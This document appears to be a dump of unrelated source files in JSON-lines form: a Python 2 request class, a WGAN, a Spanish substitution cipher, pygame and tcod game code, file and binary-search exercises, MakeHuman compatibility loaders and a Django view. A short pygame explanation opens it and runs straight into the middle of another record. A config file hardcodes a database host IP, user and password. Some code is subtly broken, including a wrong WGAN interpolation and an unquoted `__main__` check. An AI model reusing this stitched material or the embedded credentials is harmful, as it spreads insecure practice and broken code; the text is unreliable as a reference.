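`Ship.update` above keeps a float `self.y` alongside the integer rect and copies it back each frame, because pygame rects truncate coordinates to ints. A self-contained toy of that pattern, with a hypothetical fractional speed to show why the float shadow matters:

```python
class Position:
    """Float shadow for an integer rect coordinate, as in Ship above."""

    def __init__(self, y, speed):
        self.y = float(y)      # precise position
        self.speed = speed
        self.rect_y = y        # what a pygame.Rect would store

    def move_up(self):
        self.y -= self.speed
        self.rect_y = int(self.y)

p = Position(100, 1.5)
p.move_up()
assert (p.y, p.rect_y) == (98.5, 98)
```

Without the float shadow, each 1.5-pixel step stored straight into an int coordinate would lose the fractional half every frame.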
user try to visit http://example.com/?key=value&a=b&a=c, method is GET:\n It will get:\n param = {'key': 'value', 'a':['b', 'c']}\n \"\"\"\n raw_data = parse_qs(\n self.environ.get('QUERY_STRING', ''), keep_blank_values=True\n )\n params = {}\n for key, value in raw_data.iteritems():\n if len(value) == 1:\n params[key] = value[0]\n else:\n params[key] = value\n return params\n\n @lazy_property\n def form(self):\n if self.method not in ('POST', 'PUT'):\n return {}\n\n d = self.__dict__\n if '_form' not in d:\n d['_form'], d['_file'] = parse_form_data(self.environ)\n return self._form\n\n @lazy_property\n def file(self):\n if self.method not in ('POST', 'PUT'):\n return {}\n\n d = self.__dict__\n if '_file' not in d:\n d['_form'], d['_file'] = parse_form_data(self.environ)\n return self._file\n\n\nclass Request(BaseRequest):\n pass\n","repo_name":"EricQAQ/Puck","sub_path":"puck/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"15105110398","text":"import tensorflow as tf\nfrom tensorflow.keras import layers\n\nfrom models.critic import Critic\nfrom models.generator import Generator\n\nclass WGAN(tf.keras.Model):\n def __init__(self, config):\n super(WGAN, self).__init__()\n self.batch_size = config[\"batch_size\"]\n self.latent_dims = config[\"latent_dims\"]\n self.critic_steps= config[\"critic_extra_train_steps\"]\n self.grad_penalty_weight = config[\"grad_penalty_weight\"]\n self.critic = Critic(config)\n self.generator = Generator(config)\n\n def compile(self, d_optimizer, g_optimizer, c_loss_fn, g_loss_fn):\n super().compile()\n self.d_optimizer = d_optimizer\n self.g_optimizer = g_optimizer\n self.c_loss_fn = c_loss_fn\n self.g_loss_fn = g_loss_fn\n self.d_loss_metric = tf.keras.metrics.Mean(name=\"d_loss\")\n self.g_loss_metric = tf.keras.metrics.Mean(name=\"g_loss\")\n\n def gradient_penalty(self, real_images, fake_images):\n alpha = tf.random.normal([self.batch_size, 1, 1, 1], 0.0, 1.0)\n interpolated = real_images * alpha - fake_images * (1-alpha)\n\n with tf.GradientTape() as tape:\n tape.watch(interpolated)\n # 1. get the descriminator output for the interpolated image\n pred = self.critic(interpolated, training=True)\n\n # 2. Calculate the gradient w.r.t to this interpolated image\n grads = tape.gradient(pred, [interpolated])[0]\n\n # 3. 
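`request_params` above flattens `parse_qs` output so single values come back bare while repeated keys stay lists (the file targets Python 2, hence `urlparse` and `iteritems`; on Python 3 the import moves to `urllib.parse` and the method is `items`). A self-contained check of that flattening:

```python
from urllib.parse import parse_qs

raw = parse_qs("key=value&a=b&a=c", keep_blank_values=True)
# parse_qs always returns lists; unwrap singletons, as request_params does.
params = {k: v[0] if len(v) == 1 else v for k, v in raw.items()}
assert params == {"key": "value", "a": ["b", "c"]}
```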
calculate the norm of the gradients\n norm = tf.sqrt(tf.reduce_sum(tf.square(grads), axis=[1, 2, 3]))\n gp = tf.reduce_mean((norm - 1)**2)\n return gp\n\n\n @tf.function\n def train_generator(self, real_images):\n noise_vectors = tf.random.normal(shape=[self.batch_size, self.latent_dims])\n\n with tf.GradientTape() as tape:\n generated_images = self.generator(noise_vectors)\n critic_logits = self.critic(generated_images)\n generator_loss = self.g_loss_fn(critic_logits)\n\n grads = tape.gradient(generator_loss, self.generator.trainable_variables)\n self.g_optimizer.apply_gradients(zip(grads, self.generator.trainable_variables))\n self.g_loss_metric.update_state(generator_loss)\n\n @tf.function\n def train_critic(self, real_images):\n for _ in range(self.critic_steps):\n noise_vectors = tf.random.normal(shape=[self.batch_size, self.latent_dims])\n\n generated_images = self.generator(noise_vectors)\n\n # Train the critic\n with tf.GradientTape() as tape:\n fake_images_logits = self.critic(generated_images)\n real_images_logits = self.critic(real_images)\n\n critic_cost = self.c_loss_fn(real_images_logits, fake_images_logits)\n gp = self.gradient_penalty(real_images, generated_images)\n c_loss = critic_cost + gp * self.grad_penalty_weight\n\n grads = tape.gradient(c_loss, self.critic.trainable_variables)\n self.d_optimizer.apply_gradients(zip(grads, self.critic.trainable_variables))\n self.d_loss_metric.update_state(c_loss)\n\n @tf.function\n def train_step(self, real_images):\n self.train_generator(real_images)\n self.train_critic(real_images)\n\n return {\n \"generator_loss\": self.g_loss_metric.result(),\n \"discriminator_loss\": self.d_loss_metric.result()\n }\n","repo_name":"jmattdale/generative_models","sub_path":"w_gan/models/wgan.py","file_name":"wgan.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72835177833","text":"def encripta():\r\n \r\n import string\r\n ALFABETO = string.ascii_lowercase\r\n plaintext = input(\"Ingrese el texto a encriptar: \")\r\n \r\n llave = input(\"Ingrese la llave: \")\r\n ciphertext =\"\"\r\n if len(llave)!=26:\r\n print(\"La llave debe tener 26 caracteres\")\r\n encripta()\r\n elif not llave.isalpha():\r\n print(\"La llave tiene caracteres no alfabeticos\") \r\n encripta() \r\n else:\r\n for l in plaintext:\r\n \r\n if l.lower() in ALFABETO:\r\n c = ALFABETO.find(l.lower())\r\n \r\n if l.isupper():\r\n ciphertext += ciphertext.join(llave[c].upper())\r\n else:\r\n ciphertext += ciphertext.join(llave[c].lower())\r\n else:\r\n ciphertext += ciphertext.join(l)\r\n \r\n print(\"Texto plano: \", plaintext)\r\n print(\"Texto encriptado: \", ciphertext)\r\n print(\"0\")\r\n\r\nencripta()","repo_name":"ClaudiaTacillo/Python_final","sub_path":"Semana 1/sustitution.py","file_name":"sustitution.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15344394150","text":"institution_types = [\n 'Any',\n 'Hospital',\n 'Dentistry',\n 'Primary Care Clinic ',\n 'Urgent Care Clinic',\n 'Convenience Clinic',\n 'Imaging Center',\n 'Laboratory',\n 'Supplier',\n 'Specialty Center',\n 'Other'\n]\n\ninsurer_types = [\n 'Any',\n 'United Healthcare',\n 'BlueCross BlueShield PPO/EPO',\n 'Aetna Open Choice PPO',\n 'Other'\n]\n\nPGHOST : str ='104.154.251.225'\nPGDATABASE : str ='postgres'\nPGUSER : str ='postgres'\nPGPASSWORD : str 
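`gradient_penalty` above computes the per-sample gradient norm over the spatial and channel axes and penalises its distance from 1 (note that the interpolation here uses `real * alpha - fake * (1 - alpha)`, whereas the usual WGAN-GP formulation adds the two terms). A self-contained check of the norm/penalty arithmetic with toy gradients:

```python
import tensorflow as tf

grads = tf.ones([4, 8, 8, 3])                  # toy per-sample gradients
# L2 norm per sample over height, width and channels -> shape (4,)
norm = tf.sqrt(tf.reduce_sum(tf.square(grads), axis=[1, 2, 3]))
gp = tf.reduce_mean((norm - 1.0) ** 2)         # penalty term: (||g|| - 1)^2
assert norm.shape == (4,) and gp.shape == ()
```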
='goober'\n","repo_name":"siegelzc/medview","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"74270022311","text":"import pygame, os, sys\n\nfrom images import IMAGESDICT\n\n\n# Screen scales :\nFPS = 30 # frames per second to update the screen\nWINWIDTH = 800 # width of the program's window, in pixels\nWINHEIGHT = 800 # height in pixels\nHALF_WINWIDTH = int(WINWIDTH / 2)\nHALF_WINHEIGHT = int(WINHEIGHT / 2)\n\n# Start Screen of the game \ndef startScreen():\n \"\"\"Display the start screen (which has the title and instructions)\n until the player presses a key. Returns None.\"\"\"\n\n # Position the title image.\n titleRect = IMAGESDICT['title'].get_rect()\n topCoord = 50 # topCoord tracks where to position the top of the text\n titleRect.top = topCoord\n titleRect.centerx = HALF_WINWIDTH\n topCoord += titleRect.height\n\n # Unfortunately, Pygame's font & text system only shows one line at\n # a time, so we can't use strings with \\n newline characters in them.\n # So we will use a list with each line in it.\n instructionText = ['Push the stars over the marks.',\n 'Arrow keys to move, WASD for camera control, P to change character.',\n 'Backspace to reset level, Esc to quit.',\n 'N for next level, B to go back a level.']\n\n # Start with drawing a blank color to the entire window:\n DISPLAYSURF.fill(BGCOLOR)\n\n # Draw the title image to the window:\n DISPLAYSURF.blit(IMAGESDICT['title'], titleRect)\n\n # Position and draw the text.\n for i in range(len(instructionText)):\n instSurf = BASICFONT.render(instructionText[i], 1, TEXTCOLOR)\n instRect = instSurf.get_rect()\n topCoord += 10 # 10 pixels will go in between each line of text.\n instRect.top = topCoord\n instRect.centerx = HALF_WINWIDTH\n topCoord += instRect.height # Adjust for the height of the line.\n DISPLAYSURF.blit(instSurf, instRect)\n\n while True: # Main loop for the start screen.\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n return # user has pressed a key, so return.\n\n # Display the DISPLAYSURF contents to the actual screen.\n pygame.display.update()\n FPSCLOCK.tick()\n\n\n\n# Here we need to create the screen where the map is constructed\n\n\n\n\n\ndef main():\n pass\n\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\nif __name__ == __main__:\n main()","repo_name":"BarriBarri20/EscapeTheMaze","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1482498573","text":"import tcod as libtcod\n\nfrom enum import Enum\n\n\nclass RenderOrder(Enum):\n CORPSE = 1\n ITEM = 2\n ACTOR = 3\n\n\ndef get_names_under_mouse(mouse, entities, fov_map):\n (x, y) = (mouse.cx, mouse.cy)\n\n names = [entity.title() for entity in entities\n if entity.x == x and entity.y == y and libtcod.map_is_in_fov(fov_map, entity.x, entity.y)]\n names = ', '.join(names)\n return names.capitalize()\n\n\ndef render_bar(panel, x, y, total_width, name, value, maximum, bar_color, back_color):\n bar_width = int(float(value) / maximum * total_width)\n\n libtcod.console_set_default_background(panel, back_color)\n libtcod.console_rect(panel, x, y, total_width, 1, False, libtcod.BKGND_SCREEN)\n\n libtcod.console_set_default_background(panel, bar_color)\n if bar_width > 
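The maze `main.py` above ends with `if __name__ == __main__:`, comparing against a bare `__main__` name that doesn't exist, so running the module raises `NameError` before `main()` is ever reached. The standard guard quotes the string:

```python
if __name__ == "__main__":
    main()
```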
0:\n libtcod.console_rect(panel, x, y, bar_width, 1, False, libtcod.BKGND_SCREEN)\n\n libtcod.console_set_default_foreground(panel, libtcod.white)\n libtcod.console_print_ex(panel, int(x + total_width / 2), y,\n libtcod.BKGND_NONE, libtcod.CENTER,\n '{0}: {1}/{2}'.format(name, value, maximum))\n\n\n# noinspection PyTypeChecker\ndef render_all(con, panel, entities, player, game_map, fov_map, fov_recompute,\n message_log, screen_width, screen_height, bar_width,\n panel_height, panel_y, mouse, colors):\n draw_map(con, game_map, fov_map, fov_recompute, colors)\n\n entities_in_render_order = sorted(entities, key=lambda x: x.render_order.value)\n\n for entity in entities_in_render_order:\n draw_entity(con, entity, fov_map)\n\n libtcod.console_blit(con, 0, 0, screen_width, screen_height, 0, 0, 0)\n \n libtcod.console_set_default_background(panel, libtcod.black)\n libtcod.console_clear(panel)\n\n y = 1\n for message in message_log.messages:\n libtcod.console_set_default_foreground(panel, message.color)\n libtcod.console_print_ex(panel, message_log.x, y, libtcod.BKGND_NONE, libtcod.LEFT, message.text)\n y += 1\n\n render_bar(panel, 1, 1, bar_width, 'HP',\n player.combat.hp, player.combat.max_hp,\n libtcod.light_red, libtcod.darker_red)\n\n libtcod.console_set_default_foreground(panel, libtcod.light_grey)\n libtcod.console_print_ex(panel, 1, 0, libtcod.BKGND_NONE, libtcod.LEFT,\n get_names_under_mouse(mouse, entities, fov_map))\n\n libtcod.console_blit(panel, 0, 0, screen_width, panel_height, 0, 0, panel_y)\n\n\ndef clear_all(con, entities):\n for entity in entities:\n clear_entity(con, entity)\n\n\ndef draw_map(con, game_map, fov_map, fov_recompute, colors):\n if fov_recompute:\n for y in range(game_map.height):\n for x in range(game_map.width):\n visible = libtcod.map_is_in_fov(fov_map, x, y)\n wall = game_map.tiles[x][y].block_sight\n\n color = libtcod.Color(0, 0, 0)\n if visible:\n if wall:\n color = colors.get('light_wall')\n else:\n color = colors.get('light_ground')\n game_map.tiles[x][y].explored = True\n elif game_map.tiles[x][y].explored: \n if wall:\n color = colors.get('dark_wall')\n else:\n color = colors.get('dark_ground')\n draw_tile(con, x, y, color)\n\n\ndef draw_tile(con, x, y, color):\n libtcod.console_set_char_background(con, x, y, color, libtcod.BKGND_SET)\n\n\ndef draw_entity(con, entity, fov_map):\n if libtcod.map_is_in_fov(fov_map, entity.x, entity.y):\n libtcod.console_set_default_foreground(con, entity.color)\n libtcod.console_put_char(con, entity.x, entity.y, entity.char, libtcod.BKGND_NONE)\n\n\ndef clear_entity(con, entity):\n libtcod.console_put_char(con, entity.x, entity.y, ' ', libtcod.BKGND_NONE)\n","repo_name":"Kehvarl/roguelike_tutorial_2019","sub_path":"render_functions.py","file_name":"render_functions.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"38537689635","text":"# Дан текстовый файл, требуется переписать в новый файл все строки исходного файла в обратном порядке.\nbuff = []\nSTEP = 128\nfin = open('input', 'rb')\nfout = open('output', 'wb')\n\npos = fin.seek(0, 2)\nn = STEP\nwhile pos != 0:\n fin.seek(pos)\n\n data = fin.read(n)\n if b'\\n' in data:\n lines = data.split(b'\\n')\n fout.write(lines[-1] + b''.join(reversed(buff)) + b'\\n')\n buff.clear()\n if len(lines) > 2:\n for l in lines[-2:0:-1]:\n fout.write(l + b'\\n')\n buff.append(lines[0])\n else:\n buff.append(data)\n\n n = min(pos, STEP)\n pos = max(0, pos-STEP)\n\nfin.seek(0)\ndata = 
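`render_all` above sorts entities by `entity.render_order.value` so that corpses draw first and actors draw last, ending up on top. A self-contained toy of that enum-keyed sort:

```python
from enum import Enum

class RenderOrder(Enum):
    CORPSE = 1
    ITEM = 2
    ACTOR = 3

entities = [("hero", RenderOrder.ACTOR), ("potion", RenderOrder.ITEM),
            ("rat corpse", RenderOrder.CORPSE)]
# Lower values are drawn first, so the actor is painted over everything else.
ordered = sorted(entities, key=lambda e: e[1].value)
assert [n for n, _ in ordered] == ["rat corpse", "potion", "hero"]
```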
fin.read(n)\nif data:\n lines = data.split(b'\\n')\n fout.write(lines[-1] + b''.join(reversed(buff)) + b'\\n')\n for l in lines[-2::-1]:\n fout.write(l+b'\\n')\nfout.close()\n\n\n","repo_name":"Zettroke/python-labs-bmstu-2019-2020","sub_path":"lab10/lab10_def.py","file_name":"lab10_def.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71144861672","text":"#입국심사 22-01-28\nn,m = map(int,input().split()) #입국심사대, 사람수\ntime =[0]*(n) #입국심사대에서 걸리는 시간\nfor i in range(n):\n t = int(input())\n time[i]=t\n\n#총 시간을 기준으로 이분 탐색\nstart = min(time) #최소시간\nend=max(time)*m #최대시간\nanswer=0\nwhile start<=end:\n mid = (start+end)//2\n count=0\n for t in time:\n count+=mid//t #주어진 시간동안 심사할 수 있는 사람 수\n\n if count long01\n \"710b4c8c-d34e-47a8-9d1d-e3f623bb8d95\": \"766436e9-63ed-4f6a-afa9-99f3acff70a8\", # mhair01 -> short01\n \"f81a4e9a-e3d7-4ecb-bdf0-16d7fd9070a4\": \"c104cd4a-1edc-43f9-8b94-f63345a44638\", # mhair02 -> short02\n }\n }\n\n skin_mapping = { \"skins/young_asian_female/young_asian_female_sweat.mhmat\": \"skins/young_asian_female/young_asian_female.mhmat\",\n \"skins/young_asian_female/young_asian_male_sweat.mhmat\": \"skins/young_asian_female/young_asian_male.mhmat\",\n \"skins/young_african_female/young_african_female_sweat.mhmat\": \"skins/young_african_female/young_african_female.mhmat\",\n \"skins/young_african_female/young_african_male_sweat.mhmat\": \"skins/young_african_female/young_african_male.mhmat\",\n \"skins/young_caucasian_female/young_caucasian_female_sweat.mhmat\": \"skins/young_caucasian_female/young_caucasian_female.mhmat\",\n \"skins/young_caucasian_female/young_caucasian_male_sweat.mhmat\": \"skins/young_caucasian_female/young_caucasian_male.mhmat\"\n }\n\n def getModifierMapping(self):\n if self.modifier_mapping is None:\n self.modifier_mapping = dict()\n with open(getpath.getSysDataPath('modifiers/mh_1-0_modifier_mapping.csv'), 'r', encoding='utf-8') as f:\n csvreader = csv.reader(f, delimiter=',', quotechar='\"')\n for r_idx, row in enumerate(csvreader):\n if r_idx == 0:\n # First line is header, drop it\n continue\n if row[0]:\n self.modifier_mapping[row[0]] = (row[1], bool(row[2]))\n return self.modifier_mapping\n\n def loadProperty(self, line_data, default_load_callback, strict):\n prop = line_data[0]\n if prop in ['tags', 'camera', 'subdivide']:\n default_load_callback(line_data)\n return\n if prop == 'skeleton':\n skeltype = line_data[1]\n if skeltype in self.skel_mapping:\n skel = self.skel_mapping[skeltype]\n if skel:\n default_load_callback([\"skeleton\", skel])\n else:\n log.warning(\"There is no good replacement for MH v1.0 rig %s\" % skeltype)\n elif prop == 'skinMaterial':\n mat = line_data[1]\n if mat in self.skin_mapping:\n default_load_callback([\"skinMaterial\", self.skin_mapping[mat]])\n else:\n default_load_callback(line_data)\n elif prop in self.target_mapping:\n target_name = line_data[1]\n value = float(line_data[2])\n\n if prop == \"custom\":\n modifier_name = \"custom/%s\" % target_name\n default_load_callback([\"modifier\", modifier_name, value])\n return\n\n modifier_name = self.targetToModifier(prop, target_name)\n new_modifier = self.mapModifier(modifier_name, value)\n\n if new_modifier:\n modifier_name, value = new_modifier\n else:\n log.warning(\"No 1.0 -> 1.1 mapping found for modifier %s\", modifier_name)\n\n default_load_callback([\"modifier\", modifier_name, value])\n elif prop in self.proxy_mapping:\n mapping = self.proxy_mapping[prop]\n 
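The short solution above (its Korean comments say: `n` immigration desks and `m` people, binary search on the total time between `min(time)` and `max(time)*m`) searches on the answer: a candidate time `mid` is feasible when the desks can jointly process `sum(mid // t)` people. A self-contained version of that decision-plus-search:

```python
def min_total_time(times, people):
    lo, hi = min(times), max(times) * people
    answer = hi
    while lo <= hi:
        mid = (lo + hi) // 2
        # How many people all desks can clear within `mid` minutes.
        if sum(mid // t for t in times) >= people:
            answer = mid          # feasible: try to finish sooner
            hi = mid - 1
        else:
            lo = mid + 1
    return answer

assert min_total_time([7, 10], 6) == 28
```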
name = line_data[1]\n pxy = line_data[2]\n if pxy in mapping:\n default_load_callback([prop, name, mapping[pxy]])\n else:\n default_load_callback(line_data)\n\n else:\n default_load_callback(line_data)\n\n def targetToModifier(self, target_savename, target_name):\n \"\"\"\n Map a target and savename, as stored in 1.0.x MHM files\n to the name of the corresponding modifier (in 1.0).\n Returns the MH 1.0.x modifier name corresponding to that\n target.\n \"\"\"\n mapping = self.target_mapping[target_savename]\n if target_name in mapping:\n return mapping[target_name]\n\n tokens = target_name.split('-')\n if '-'.join(tokens[-2:]) in self.trail_tokens:\n target_name = '-'.join(tokens[:-2]+[self.trail_tokens['-'.join(tokens[-2:])]])\n\n if tokens[0] in self.leading_tokens:\n modifier_name = \"%s/%s\" % (self.leading_tokens[tokens[0]], target_name)\n elif '-'.join(tokens[:2]) in self.leading_tokens:\n modifier_name = \"%s/%s\" % (self.leading_tokens['-'.join(tokens[:2])], target_name)\n else:\n modifier_name = \"%s/%s\" % (tokens[0], target_name)\n return modifier_name\n\n def mapModifier(self, modifier_name, value):\n \"\"\"\n Map a MH 1.0.x modifier name and a value for it to a modifier\n in MH 1.1.x and the corresponding value.\n \"\"\"\n mapping = self.getModifierMapping()\n result = mapping.get(modifier_name, None)\n if result is None:\n return None\n new_modifier_name, invert_value = result\n if invert_value:\n value = -value\n return (new_modifier_name, value)\n\n def getAcceptedVersion(self):\n return (1, 0)\n\n\nclass MHM11Loader(object):\n\n def loadProperty(self, line_data, default_load_callback, strict):\n if line_data[0] == 'tags':\n line_data[0] = 'name'\n default_load_callback(line_data)\n else:\n default_load_callback(line_data)\n\n def getAcceptedVersion(self):\n return(1, 1)\n\n\ndef getMHMLoader(version):\n for loader in mhm_loaders:\n if all([(i < len(version) and v == version[i]) for i, v in enumerate(loader.getAcceptedVersion())]):\n return loader\n raise RuntimeError(\"No suitable MHM backward compatibility loader found for version %s\" % (version, ))\n\ndef loadMHM(version, lines, default_load_callback, strict=False):\n version_ = _parse_version(version)\n if version_ is None:\n raise RuntimeError(\"Failed to parse version %s\" % version)\n\n fprog = progress.Progress(len(lines))\n loader = getMHMLoader(version_)\n for lineData in lines:\n lineData = lineData.strip().split()\n loader.loadProperty(lineData, default_load_callback, strict)\n fprog.step()\n\n\nmhm_loaders = [ MHM10Loader(), MHM11Loader() ]\n\n","repo_name":"makehumancommunity/makehuman","sub_path":"makehuman/apps/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":14368,"program_lang":"python","lang":"en","doc_type":"code","stars":1090,"dataset":"github-code","pt":"67"} +{"seq_id":"10100413759","text":"from functions import *\nimport re\npath = './clase_11/data_stark.json'\nlista_heroes = parse_json(path)\n\n\ndef menu_principal(lista: list):\n '''\n Función principal que imprime el menu y toma los datos del cliente para mostrar/guardar los datos a elección\n Recibe la lista de heroes\n '''\n while True:\n menu_app()\n answer = input('\\nElija una opcion:\\n> ')\n if re.search('^[1-6]{1}$', answer):\n if answer == '1':\n aux_answer = input('Elija la cantidad de heroes a listar:\\n> ')\n final_listar_heroes(lista, aux_answer)\n elif answer == '2':\n aux_answer = input(\n 'Elija el orden que desea recibir los datos [\"asc\"]: Ascendente | [\"desc\"]: Descendente:\\n> ')\n 
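`getMHMLoader` above picks a loader by checking that the loader's accepted `(major, minor)` prefix matches the parsed file version elementwise. That predicate in isolation, with toy version tuples:

```python
def accepts(version, accepted):
    # True when `accepted` is a prefix of `version`, as in getMHMLoader above.
    return all(i < len(version) and version[i] == v
               for i, v in enumerate(accepted))

assert accepts((1, 0, 2), (1, 0))       # an MHM 1.0 loader takes 1.0.x files
assert not accepts((1, 1, 0), (1, 0))   # but not 1.1.x ones
```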
final_ordenar_listar_altura(lista, aux_answer)\n elif answer == '3':\n aux_answer = input(\n 'Elija el orden que desea recibir los datos [\"asc\"]: Ascendente | [\"desc\"]: Descendente:\\n> ')\n final_ordenar_listar_fuerza(lista, aux_answer)\n elif answer == '4':\n aux_key = input(\n 'Escriba qué dato numérico desea calcular el promedio [\"altura\", \"peso\" o \"fuerza]\\n> ')\n aux_tipo = input(\n 'Elija si desea evaluar por menor o mayor en el promedio [\"menor\"]: Buscar los menores | [\"mayor\"]: Buscar los mayores:\\n> ')\n final_listar_heroes_segun_promedio(lista, aux_key, aux_tipo)\n elif answer == '5':\n final_listar_heroes_inteligencia(lista)\n elif answer == '6':\n break\n else:\n print('[ERROR] Elija una opción correcta')\n continue\n\n\nmenu_principal(lista_heroes)\n","repo_name":"JuliFerz/labo-progra_1","sub_path":"clase_11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17063397918","text":"from __future__ import print_function\n\nimport collections\nimport json\nimport uuid\nfrom urllib.request import urlopen\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.template.response import TemplateResponse\n\n# from research.templatetags.research_extras import all_snippets\nfrom research.data.misc_utils import get_advanced_query, get_date_parameter, format_for_gallery\n\nfrom research.data.sesson_keys import SESSION_FULL_TEXT_SEARCH, SESSION_VALUE_CHANGED, SESSION_ENGINE_SEARCH, \\\n SESSION_SDATE_SEARCH, SESSION_EDATE_SEARCH, SESSION_BOOL_AND_SEARCH, SESSION_BOOL_NOT_SEARCH, \\\n SESSION_BOOL_OR_SEARCH, SESSION_LOC_SEARCH, SESSION_IS_CHANGED_KEY, SESSION_VALUE_NOT_CHANGED\nfrom model.myutils.clustering_utils import map_cluster_to_data, summarize_clusters\nfrom model.myutils.data_utils import get_sentences, map_cluster_to_data_expanded, map_cluster_to_doc_expanded\nfrom model.myutils.graph_builder import build_doc_graph, connect_mm_doc_to_clusters, expand_view\nfrom model.myutils.my_files_utils import save_json, read_json\n\nfrom model.research.clusters import get_agg_clust_assignment\nfrom model.research.embeddings import get_sentence_embedding, search_through_embeddings, get_snip_view\nfrom model.research.results_aggregate import get_all_vertical_results\n\n\nfrom django.http import HttpResponse\nfrom django.views.decorators.clickjacking import xframe_options_exempt\n\n@xframe_options_exempt\ndef index(request):\n print('here')\n\n if request.session.get('uid', None) is None:\n request.session['uid'] = str(uuid.uuid4())\n\n full_text_search = \"\"\n lookup_level = \"\"\n date_start = \"\"\n date_end = \"\"\n search_engine = \"\"\n boolean_and = \"\"\n boolean_or = \"\"\n boolean_not = \"\"\n location = \"\"\n\n parameters = dict()\n\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_NOT_CHANGED\n\n if 'ft_search' in request.GET:\n full_text_search = request.GET['ft_search']\n\n if request.session.get(SESSION_FULL_TEXT_SEARCH, SESSION_VALUE_CHANGED) != full_text_search:\n request.session[SESSION_FULL_TEXT_SEARCH] = full_text_search\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'lookup' in request.GET:\n lookup_level = request.GET['lookup']\n\n if 'engine' in request.GET:\n search_engine = request.GET['engine'].lower()\n parameters['engine'] = search_engine\n\n if request.session.get(SESSION_ENGINE_SEARCH, SESSION_VALUE_CHANGED) != search_engine:\n 
request.session[SESSION_ENGINE_SEARCH] = search_engine\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n else:\n search_engine = 'google'\n parameters['engine'] = search_engine\n\n # if search_engine is None or search_engine == '':\n # search_engine = 'qwant'\n\n if 'sdate' in request.GET and 'edate' in request.GET:\n date_start = request.GET['sdate']\n date_end = request.GET['edate']\n\n if request.session.get(SESSION_SDATE_SEARCH, SESSION_VALUE_CHANGED) != date_start:\n request.session[SESSION_SDATE_SEARCH] = date_start\n request.session[SESSION_EDATE_SEARCH] = date_end\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if search_engine == '' or search_engine == 'google':\n parameters['tbs'] = get_date_parameter(date_start, date_end, search_engine)\n else:\n parameters['freshness'] = get_date_parameter(date_start, date_end, search_engine)\n\n if 'andInput' in request.GET:\n boolean_and = request.GET['andInput']\n\n if request.session.get(SESSION_BOOL_AND_SEARCH, SESSION_VALUE_CHANGED) != boolean_and:\n request.session[SESSION_BOOL_AND_SEARCH] = boolean_and\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'orInput' in request.GET:\n boolean_or = request.GET['orInput']\n\n if request.session.get(SESSION_BOOL_OR_SEARCH, SESSION_VALUE_CHANGED) != boolean_or:\n request.session[SESSION_BOOL_OR_SEARCH] = boolean_or\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'notInput' in request.GET:\n boolean_not = request.GET['notInput']\n\n if request.session.get(SESSION_BOOL_NOT_SEARCH, SESSION_VALUE_CHANGED) != boolean_not:\n request.session[SESSION_BOOL_NOT_SEARCH] = boolean_not\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n if 'loc' in request.GET:\n location = request.GET['loc']\n\n if search_engine == '' or search_engine == 'google':\n parameters['cr'] = 'country' + location\n else:\n parameters['loc'] = location\n\n if request.session.get(SESSION_LOC_SEARCH, SESSION_VALUE_CHANGED) != location:\n request.session[SESSION_LOC_SEARCH] = location\n request.session[SESSION_IS_CHANGED_KEY] = SESSION_VALUE_CHANGED\n\n # if False:\n if request.session.get(SESSION_IS_CHANGED_KEY, SESSION_VALUE_NOT_CHANGED) == SESSION_VALUE_CHANGED:\n # search_engine = 'qwant'\n\n parameters['q'] = get_advanced_query(boolean_and, boolean_or, boolean_not, full_text_search)\n\n parameters_str = ''\n\n for k, v in parameters.items():\n if k == 'q':\n parameters_str = v + parameters_str\n elif k == 'loc':\n parameters_str = k + ':' + v\n elif k == 'engine':\n print('hehe')\n else:\n parameters_str = '&' + k + '=' + v\n\n query = parameters_str\n\n print(\"test\")\n search_results = get_all_vertical_results(query=query, num=100,\n engine=search_engine) # Initiate search results in real time\n search_results_sentences = get_sentences(\n search_results) # Combine all the vailable text for embeddings with preprocessing\n search_result_sentence_embeddings = get_sentence_embedding(\n search_results_sentences) # Get search results embeddings\n\n snip_view_process = search_through_embeddings(query, search_result_sentence_embeddings,\n search_results) # save the snip view ordered by cosine relevancy\n\n # perform agg clustering\n search_results_cluster_assignment = get_agg_clust_assignment(search_result_sentence_embeddings,\n 13.48) # [1, 2,23...]\n # replace cluster assignment to data: clust1 -> snippet 1, 2, .....\n bucket_cluster_assignment_sentences = map_cluster_to_data(search_results_cluster_assignment,\n 
